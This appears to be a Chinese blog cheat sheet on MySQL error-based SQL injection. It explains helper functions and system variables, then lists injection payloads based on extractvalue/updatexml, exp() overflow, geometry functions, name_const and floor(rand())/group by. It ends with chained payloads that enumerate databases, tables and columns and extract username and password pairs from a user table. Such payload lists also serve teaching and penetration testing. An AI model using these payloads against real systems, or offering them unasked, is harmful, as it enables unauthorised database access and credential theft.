MySQL报错注入函数汇总

常用函数

 

字符串连接函数,将多个字符串连接成一个字符串,当中间字符串有一个空时,最后结果也为空

concat(str1, str2, str3 ,...)

MySQL报错注入函数汇总_第1张图片

MySQL报错注入函数汇总_第2张图片

 

concat_ws('指定分隔符', str1,str2,str3...)

开头指定分隔符,与concat()不同,它会自动忽略中间的空值,只有分隔符为空,整体返回空

MySQL报错注入函数汇总_第3张图片

MySQL报错注入函数汇总_第4张图片

MySQL报错注入函数汇总_第5张图片

 

group_concat(field_name1,field_name2,field_name3 ...)

分组的方式连接所有字符串(把某个字段下的所有数据全部连接一个字符串),有长度限制,默认1024

MySQL报错注入函数汇总_第6张图片

MySQL报错注入函数汇总_第7张图片

MySQL报错注入函数汇总_第8张图片

 

截取字符串函数

substring(要截断的字符串,开始截取位置,截取长度)  (从1开始)

MySQL报错注入函数汇总_第9张图片MySQL报错注入函数汇总_第10张图片

MySQL报错注入函数汇总_第11张图片

substr 和 substring 操作相同

MySQL报错注入函数汇总_第12张图片

 

mysql 专有字符串截取

mid(要截断的字符串,开始截取位置,截取长度)(从1开始)

MySQL报错注入函数汇总_第13张图片

左截取 left(str, 3)  从左往右截取3个字符

MySQL报错注入函数汇总_第14张图片

右截取 right(str, 3)  从右往左截取3个字符

MySQL报错注入函数汇总_第15张图片

 

rand()函数会随机产生 [ 0 , 1 )  之间的浮点数

MySQL报错注入函数汇总_第16张图片MySQL报错注入函数汇总_第17张图片

rand(x) 每个x对应一个固定的值,可预测

MySQL报错注入函数汇总_第18张图片

rand()*2会随机产生 [ 0 , 2 )  之间的浮点数

MySQL报错注入函数汇总_第19张图片MySQL报错注入函数汇总_第20张图片

floor()函数只返回整数部分,小数部分舍弃。

MySQL报错注入函数汇总_第21张图片

round()函数四舍五入,大于0.5的部分进位,不到则舍弃。

MySQL报错注入函数汇总_第22张图片MySQL报错注入函数汇总_第23张图片

 

limit用法(从0开始)

如果只给定一个参数,表示记录数  

检索前3条记录   等价于 右图              

MySQL报错注入函数汇总_第24张图片MySQL报错注入函数汇总_第25张图片

检索4条记录,从第2条数据开始(从0开始)

MySQL报错注入函数汇总_第26张图片

 

count(*)是对行数目进行计数

MySQL报错注入函数汇总_第27张图片

 

 

 

常用的Mysql内置变量

version()                                          当前数据库详细版本号

database()                                       当前所在的数据库

user()                                               当前数据库用户权限

@@datadir                                      数据文件的存放目录

@@basedir                                     数据库的安装路径

@@version_compile_os               宿主系统平台是什么

@@hostname                                 当前机器的机器名

show variables like 'log_%            查看日志文件存放位置

 

 

 

报错函数

 

xpath处理函数报错注入

extractvalue(xml_doc, xpath)                       从指定xml文档中查询指定的字符串

updatexml(xml_doc,xpath,new_value)        利用xpath把xml文档中的指定字符串替换成新值

报错payload:

and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

MySQL报错注入函数汇总_第28张图片MySQL报错注入函数汇总_第29张图片

参数Xpath需要的是 xpath格式的字符串,不是就会报错,sql语句由内向外执行报错得到查询的信息

MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数,所以MySQL 5.1.5版本以下的不能上述函数进行报错注入

并且,上述报错注入函数有字符限制,最长32位

 

 

整形溢出报错注入

exp(x)  数学函数 返回值 e (自然对数的底) 的 x 次方

报错payload:

and exp(~(select * from(select user())a));

MySQL报错注入函数汇总_第30张图片

将0按位取反就会返回最大数“18446744073709551615”,再加上函数成功执行后返回0的缘故,我们将成功执行的函数取反就会得到最大的无符号BIGINT值。

MySQL报错注入函数汇总_第31张图片MySQL报错注入函数汇总_第32张图片MySQL报错注入函数汇总_第33张图片

MySQL报错注入函数汇总_第34张图片MySQL报错注入函数汇总_第35张图片

exp是以e为底的指数函数,由于数字太大是会产生溢出。这个函数会在参数大于709时溢出,报错。

MySQL报错注入函数汇总_第36张图片MySQL报错注入函数汇总_第37张图片

所以我们通过子查询与按位求反,造成一个DOUBLE overflow error,并借由此注出数据

MySQL报错注入函数汇总_第38张图片

MySql5.5.5版本后整形溢出才会报错

 

 

几何函数报错注入

geometrycollection(),multipoint(),polygon(),multipolygon(),linestring(),multilinestring()

函数对参数要求是形如(1 2,3 3,2 2 1)这样几何数据,如果不满足要求,则会报错

上述函数经本地测试,本地高版本MySQL无法得到数据(5.6.22)

MySQL报错注入函数汇总_第39张图片

成功得到数据如下所示:

select multipoint((select * from (select * from (select * from (select version())a)b)c));
ERROR 1367 (22007): Illegal non geometric '(select `c`.`version()` from (select '5.5.40-log' AS `version()` from dual) `c`)' value found during parsing

 

 

 

列名重复报错注入

name_const()函数 

报错payload:

select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))a;

name_const(name,value)函数会用传入的参数返回一列结果集.传入的参数必须是常量,如果不是则报错

报错payload :因为两列列名相同,外面选择时候报错,说重复列

经测试,只能查version() 函数其他可能因为不是常量的原因报参数错误的错误,不会回显想要的信息   略鸡肋

 

 

虚拟表主键重复报错注入

floor() + rand() + group by 

报错payload:

select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2));

 

原理参考链接:https://www.2cto.com/article/201604/498394.html

group by key (key为虚拟表的主键)

循环读取数据的每一行,将结果保存于临时表中。读取每一行的key时,如果key存在于临时表中,则不在临时表中更新临时表的数据;如果key不在临时表中,则在临时表中插入key所在行的数据

 

其他payload(修改 limit 即可):

爆所有数据库:

and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

MySQL报错注入函数汇总_第40张图片

 

爆表:

and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

MySQL报错注入函数汇总_第41张图片

 

爆字段:

and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=表名 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

MySQL报错注入函数汇总_第42张图片

 

爆内容:

and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

MySQL报错注入函数汇总_第43张图片

 

 

 

 

你可能感兴趣的:(数据库,漏洞利用)